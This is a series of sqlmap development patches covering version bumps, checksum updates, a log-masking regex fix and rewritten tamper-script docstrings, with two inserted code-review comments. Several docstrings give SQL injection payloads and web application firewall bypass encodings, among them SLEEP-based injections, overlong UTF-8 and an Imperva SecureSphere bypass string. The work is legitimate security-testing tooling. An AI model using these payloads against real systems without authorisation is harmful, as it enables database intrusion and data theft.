@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -de53dd81bda04541d0992852aee0f2b3 lib/core/common.py +14689a69e8c4447cc117703bb89489ad lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9c991557b5b0a38f14c5667d627ead76 lib/core/settings.py +23138239bf2e6e9a5c2e383862a6fe59 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -95,11 +95,11 @@ debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -b9f6148c8df6b9d3316ce082dc1a63dd lib/techniques/error/use.py +350d39006cf94151738a95c8d92caa28 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -8b770864bdb106ef50c70173c824395c lib/techniques/union/use.py +bfa5bcc4058eeb05c07f6e50f91952b6 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From 39108bc100da4873f36f989e76cf93e274bd2818 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:59:24 +0200 Subject: [PATCH 216/428] Trivial refactoring of unused variables --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 2 -- lib/techniques/error/use.py | 1 - lib/techniques/union/use.py | 1 - txt/checksum.md5 | 8 ++++---- 5 files changed, 5 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5a6196ec69..29fa5237f67 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.23" +VERSION = "1.2.7.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 2ed93597b2c..4dca1afb4e2 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -472,7 +472,6 @@ def blindThread(): currentCharIndex = threadData.shared.index[0] if kb.threadContinue: - start = time.time() val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset)) if val is None: val = INFERENCE_UNKNOWN_CHAR @@ -553,7 +552,6 @@ def blindThread(): while True: index += 1 - start = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 0674f38d6f7..08399cca49b 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -402,7 +402,6 @@ def errorThread(): while kb.threadContinue: with kb.locks.limit: try: - valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: 
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 1e65f67dcfb..795443b86e7 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -312,7 +312,6 @@ def unionThread(): while kb.threadContinue: with kb.locks.limit: try: - valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3fc726e5da6..c7626ee4dd7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -23138239bf2e6e9a5c2e383862a6fe59 lib/core/settings.py +04a6fc212870f1d01eff7a60bbf24d64 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 
@@ -89,17 +89,17 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py +0e9d37cbeabd1bbbfe2c53f01bbb6a6e lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py 48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -350d39006cf94151738a95c8d92caa28 lib/techniques/error/use.py +6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py -bfa5bcc4058eeb05c07f6e50f91952b6 lib/techniques/union/use.py +7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py From ce47b6c76e7c518dcda6982c341453aae0da32d7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 01:39:04 +0200 Subject: [PATCH 217/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 920d6563044..8920ca854bc 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -3454,7 +3454,7 @@ def maskSensitiveData(msg):
 retVal = retVal.replace(value, '*' * len(value))
 # Just in case (for problematic parameters regarding user encoding)
- for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal):
+ for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal):
 retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
 if getpass.getuser():
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 29fa5237f67..33bfb190a35 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.7.24"
+VERSION = "1.2.7.25"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c7626ee4dd7..41013c212a6 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py
 fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
-14689a69e8c4447cc117703bb89489ad lib/core/common.py
+af0c5caaa6328319a682073afa93ec84 lib/core/common.py
 0d082da16c388b3445e656e0760fb582 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
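Review bot: The switch to a lookahead `(?= -?-[a-z]|\Z)` deserves a comment, because the existing `# Just in case (for problematic parameters regarding user encoding)` does not say why the delimiter is no longer consumed: with the old capturing group the ` -` of the next option was eaten by the match, so a `--data` or `--cookie` value directly following a `-u` value could be left unmasked in the log output. Suggest adding `# lookahead (not a consuming group) so that consecutive sensitive options are all matched and masked`. Reassigning `retVal` inside a `finditer` loop over the original string looks like iterate-while-mutating, but as far as the hunk shows it is fine because the loop replaces by captured text rather than by offset; a short comment to that effect would save the next reader the same double-take. `maskSensitiveData` begins and ends outside the hunk.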
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -04a6fc212870f1d01eff7a60bbf24d64 lib/core/settings.py +0444c48592419fb8a365569ea17dd2be lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From cef416559a4d957b007ae2f74af6b610f6c348d1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 31 Jul 2018 00:20:52 +0200 Subject: [PATCH 218/428] Minor update --- lib/core/settings.py | 2 +- tamper/0x2char.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 33bfb190a35..778e93b942c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.25" +VERSION = "1.2.7.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/0x2char.py b/tamper/0x2char.py index bc3b7a433f9..50bbe8f51b3 100644 --- a/tamper/0x2char.py +++ b/tamper/0x2char.py @@ -18,6 +18,9 @@ def tamper(payload, **kwargs): """ Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + Requirement: + * MySQL + Tested against: * MySQL 4, 5.0 and 5.5 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41013c212a6..1ae0fd4cf14 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0444c48592419fb8a365569ea17dd2be lib/core/settings.py +08a55a677bb2cd0da088110f81cf529b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py -1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py +523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From f0e4c20004ff118a7bdf6ab79dcbcadf8c9f0c24 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 31 Jul 2018 01:17:11 +0200 Subject: [PATCH 219/428] First commit related to the #3108 --- lib/core/settings.py | 2 +- tamper/apostrophemask.py | 2 +- tamper/apostrophenullencode.py | 2 +- tamper/appendnullbyte.py | 2 +- tamper/between.py | 3 +- tamper/chardoubleencode.py | 7 +--- tamper/charencode.py | 9 ++--- tamper/charunicodeencode.py | 7 +--- tamper/charunicodeescape.py | 3 +- tamper/commalesslimit.py | 2 +- tamper/commalessmid.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 2 +- tamper/equaltolike.py | 2 +- tamper/escapequotes.py | 2 +- tamper/halfversionedmorekeywords.py | 2 +- tamper/htmlencode.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- tamper/multiplespaces.py | 2 +- tamper/nonrecursivereplacement.py | 3 +- tamper/overlongutf8.py | 5 ++- tamper/overlongutf8more.py | 5 ++- tamper/plus2concat.py | 2 +- tamper/plus2fnconcat.py | 2 +- tamper/randomcomments.py | 2 +- tamper/securesphere.py | 7 ++-- tamper/sp_password.py | 2 +- tamper/space2plus.py | 3 +- tamper/unmagicquotes.py | 3 +- txt/checksum.md5 | 62 ++++++++++++++--------------- 32 files changed, 72 insertions(+), 85 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 778e93b942c..85c54fbc2ad 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.26" +VERSION = "1.2.7.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index f41465a30dc..cc01e3f7131 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py 
@@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its UTF-8 full width counterpart + Replaces apostrophe character (') with its UTF-8 full width counterpart References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 73f4309abc5..a984d26d3cb 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its illegal double unicode counterpart + Replaces apostrophe character (') with its illegal double unicode counterpart >>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index d1c11069728..662b5785745 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends encoded NULL byte character at the end of payload + Appends encoded NULL byte character (%00) at the end of payload Requirement: * Microsoft Access diff --git a/tamper/between.py b/tamper/between.py index d805523a216..827e30ee1b8 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - Replaces equals operator ('=') with 'BETWEEN # AND #' + Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index c7b51c646b8..19a50bf5c7c 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py 
@@ -16,13 +16,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double url-encodes all characters in a given payload (not processing - already encoded) + Double URL-encodes all characters in a given payload (not processing already encoded) Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset + * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD FROM%20TABLE') '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' diff --git a/tamper/charencode.py b/tamper/charencode.py index ea7f4a2a476..37f5ff31c0a 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Url-encodes all characters in a given payload (not processing already - encoded) + URL-encodes all characters in a given payload (not processing already encoded) Tested against: * Microsoft SQL Server 2005 @@ -26,10 +25,8 @@ def tamper(payload, **kwargs): * PostgreSQL 8.3, 8.4, 9.0 Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS + * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset + * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS >>> tamper('SELECT FIELD FROM%20TABLE') '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index b0e34aad170..0c07a31fc39 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py 
@@ -18,8 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) + Unicode-URL-encodes all characters in a given payload (not processing already encoded) Requirement: * ASP @@ -32,9 +31,7 @@ def tamper(payload, **kwargs): * PostgreSQL 9.0.3 Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset + * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD%20FROM TABLE') '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 54c9b86d400..380f0736b6f 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -13,8 +13,7 @@ def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not - processing already encoded) + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) Notes: * Useful to bypass weak filtering and/or WAFs in JSON contexes diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py index 4b62246de1b..bf5d1325eed 100644 --- a/tamper/commalesslimit.py +++ b/tamper/commalesslimit.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' + Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart Requirement: * MySQL diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py index 395bd03d55b..42b004b889d 100644 --- a/tamper/commalessmid.py +++ b/tamper/commalessmid.py 
@@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' + Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart Requirement: * MySQL diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index 17525286e2f..2d998b81991 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Prepends (inline) comment before parentheses + Prepends (inline) comment before parentheses (e.g. ( -> /**/() Tested against: * Microsoft SQL Server diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index 58ff490e987..4285eaab0ec 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' + Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart Requirement: * MySQL diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 0a59962e4d1..b0a7c8977e0 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with operator 'LIKE' + Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py index f6f39ecc688..3ebcd466a58 100644 --- a/tamper/escapequotes.py +++ b/tamper/escapequotes.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Slash escape quotes (' and ") + Slash escape single and double quotes (e.g. ' -> \') >>> tamper('1" AND SLEEP(5)#') '1\\\\" AND SLEEP(5)#' 
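Review bot: The new escapequotes.py example `(e.g. ' -> \')` sits in a non-raw docstring, where `\'` evaluates to a plain `'`, so the displayed text (and the `--list-tampers` listing that reads this docstring) would show `' -> '` rather than the escaped form; the doctest two lines below already doubles its backslashes for this reason. Write `(e.g. ' -> \\')` or make the docstring raw. The charunicodeescape.py hunk in this series has the same class of problem with `\u0053\u0045...`: a Python 2 byte-string literal leaves `\u` untouched, but a unicode literal (or Python 3) decodes it to `SELECT`, which would make the example read `SELECT -> SELECT` — hedged, since the file's string-literal mode is not visible here.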
diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index d42aafee89c..6c3f0bfc10e 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -21,7 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds versioned MySQL comment before each keyword + Adds (MySQL) versioned comment before each keyword Requirement: * MySQL < 5.1 diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py index 78c244ceea7..eadf3225d16 100644 --- a/tamper/htmlencode.py +++ b/tamper/htmlencode.py @@ -16,7 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode (using code points) all non-alphanumeric characters + HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') >>> tamper("1' AND SLEEP(5)#") '1' AND SLEEP(5)#' diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 57c3f5460dc..63a2d9aa269 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -13,7 +13,7 @@ def tamper(payload, **kwargs): """ - Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier + Add a comment to the end of all occurrences of (MySQL) "information_schema" identifier >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index e287d25a2c8..0f8435598f6 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -19,7 +19,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Embraces complete query with versioned comment + Embraces complete query with (MySQL) versioned comment Requirement: * MySQL diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index a3d24a55446..cb54fc8ff47 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py 
@@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Embraces complete query with zero-versioned comment + Embraces complete query with (MySQL) zero-versioned comment Requirement: * MySQL diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index 40a2b033c06..f5b8e904b61 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds multiple spaces around SQL keywords + Adds multiple spaces (' ') around SQL keywords Notes: * Useful to bypass very weak and bespoke web application firewalls diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py index dbfe2ca2b12..a0a7d04b0d2 100644 --- a/tamper/nonrecursivereplacement.py +++ b/tamper/nonrecursivereplacement.py @@ -15,8 +15,7 @@ def tamper(payload, **kwargs): """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters + Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT) Notes: * Useful to bypass very weak custom filters diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index 70d5ff76b40..c5321317477 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py 
@@ -18,8 +18,9 @@ def tamper(payload, **kwargs): """ Converts all (non-alphanum) characters in a given payload (not processing already encoded) - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py index 3d8a8753c64..2a9ee4c14d4 100644 --- a/tamper/overlongutf8more.py +++ b/tamper/overlongutf8more.py @@ -18,8 +18,9 @@ def tamper(payload, **kwargs): """ Converts all characters in a given payload (not processing already encoded) - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index 5945797c045..fa238ae9179 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py 
@@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus ('+') character with function CONCAT() + Replaces plus operator ('+') with (MsSQL) function CONCAT() Tested against: * Microsoft SQL Server 2012 diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index 27cbbea207f..273dd6462a0 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces plus ('+') character with ODBC function {fn CONCAT()} + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} Tested against: * Microsoft SQL Server 2008 diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index d568ff10681..7004134231a 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -15,7 +15,7 @@ def tamper(payload, **kwargs): """ - Add random comments to SQL keywords + Add random inline comments inside SQL keywords >>> import random >>> random.seed(0) diff --git a/tamper/securesphere.py b/tamper/securesphere.py index 3d1a4047ec1..998a69e2cc0 100644 --- a/tamper/securesphere.py +++ b/tamper/securesphere.py @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Appends special crafted string + Appends special crafted string for bypassing Imperva SecureSphere WAF - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 + Reference: + * http://seclists.org/fulldisclosure/2011/May/163 >>> tamper('1 AND 1=1') "1 AND 1=1 and '0having'='0having'" diff --git a/tamper/sp_password.py b/tamper/sp_password.py index 9ea759018a9..540d3647a5e 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py 
